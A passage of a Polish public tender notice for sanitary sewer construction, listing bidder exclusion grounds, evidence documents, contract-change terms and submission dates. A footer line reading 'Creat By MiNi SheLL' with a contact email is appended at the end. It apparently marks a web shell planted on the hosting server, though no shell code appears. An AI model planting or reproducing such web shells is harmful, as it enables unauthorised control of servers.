wykluczeniu na podstawie art. 108 ust. 1 Pzp.<br/>•	spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu <br/>o zamówieniu i SWZ; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">•	Oświadczenie Wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz.U. z 2020 r poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,<br/>•	Odpis lub informacja z Krajowego Rejestru Sądowego lub z centralnej ewidencji i informacji o działalności gospodarczej, w zakresie art.109 ust.1 pkt.4 ustawy jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, <br/>•	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art.109 ust.1 pkt. 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Wykonawca składa dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>•	Zaświadczenie albo inny dokument właściwego oddziału regionalnego lub właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.109 ust.1 pkt.1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne i zdrowotne wraz z zaświadczeniem Wykonawca składa dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż <br/>3 000 000,00 zł <br/>•	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne dokumenty.<br/>W tym celu należy wykazać, iż Wykonawca wykonał co najmniej dwie roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia tj. budowa kanalizacji sanitarnej wraz z przepompowniami o wartości co najmniej 2 000 000,00 zł każda.<br/>•	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>W tym celu należy wykazać, iż Wykonawca dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności budowlanej, wodno-kanalizacyjnej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa oraz przynależącym do Okręgowej Izby Inżynierów Budownictwa.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony formularz oferty, załącznik do niniejszej specyfikacji<br/>2. Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw <br/> wykluczenia z postępowania na podstawie ustawy prawo zamówień publicznych – Załączniki <br/> do niniejszej specyfikacji;<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia składa <br/> każdy z wykonawców. <br/>4. Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych <br/> zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy <br/> potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi <br/> zasobami tych podmiotów (jeżeli dotyczy) oraz oświadczenia o spełnieniu warunków udziału <br/> w postępowaniu oraz o braku podstaw wykluczenia z postępowania <br/>5. Wykaz podwykonawców, w przypadku gdy wykonawca powierzy część zamówienia <br/> podwykonawcom. Wykonawca, który zamierza powierzyć wykonanie części zamówienia <br/> podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału <br/> w postępowaniu, przedstawia oświadczenie o niepodleganiu wykluczenia. <br/>6. Oświadczenie RODO.<br/>7. Kosztorys ofertowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/> W przypadku składania oferty wspólnie Wykonawcy ustanawiają Pełnomocnika, który będzie <br/> upoważniony do:<br/>•	reprezentowania ich w postępowaniu o udzielenie zamówienia, lub<br/>•	reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <br/>w ich imieniu.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia składa <br/> każdy z wykonawców. <br/> Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw <br/> wykluczenia w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału <br/> w postępowaniu .<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem , także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia , w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, mogą polegać na zdolnościach tych z wykonawców, którzy wykonują roboty budowlane, do realizacji których te zdolności są wymagane. <br/>W przypadku, o którym mowa w ust.6 dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/> Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wzór umowy stanowi załącznik do SIWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 – 455 ustawy prawo zamówień publicznych oraz wskazanym we wzorze umowy stanowiącym załącznik do SWZ.<br/>3. Zamawiający przewiduje zmiany w wysokości wynagrodzenia należnego wykonawcy, w <br/> przypadku zmiany:<br/>a) stawki podatku od towarów i usług, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę,<br/>b)	Wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy o minimalnym wynagrodzeniu za pracę,<br/>c)	Zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d)	Zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie o pracowniczych planach kapitałowych<br/>Jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę <br/>4. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w zakresie:<br/>1)	Terminu zakończenia realizacji robót na uzasadniony wniosek Wykonawcy pod warunkiem, że zmiana ta nie wynika z winy Wykonawcy oraz których Wykonawca nie mógł przewidzieć na etapie składania oferty<br/>2)	zmiany kierownika budowy na innego spełniającego wymagania określone w niniejszej SIWZ - w uzasadnionym przypadku;<br/>3)	innych istotnych zmian wynikających ze zmiany przepisów prawa, jeżeli będą miały wpływ na przedmiot zamówienia.<br/>5. W trakcie trwania umowy Wykonawca zobowiązuje się do pisemnego powiadamiania <br/> Zmawiającego o zmianie siedziby lub nazwy firmy, zmianie osób reprezentujących, ogłoszeniu <br/> upadłości, ogłoszeniu likwidacji, zawieszenia działalności, wszczęcia postępowania układowego, w <br/> którym uczestniczy Wykonawca. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę wraz z dokumentami, opatrzonymi kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym o których mowa w rozdziale XI pkt. 1 należy złożyć za pośrednictwem Formularza do złożenia oferty dostępnego na ePUAP i udostępnionych również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W toku postępowania o udzielenie zamówienia Wykonawcom przysługują środki ochrony prawnej przewidziane w Dziale IX ustawy Prawo zamówień publicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com